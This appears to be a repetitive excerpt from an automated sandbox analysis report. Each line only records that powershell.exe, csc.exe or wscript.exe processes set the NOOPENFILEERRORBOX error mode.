                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
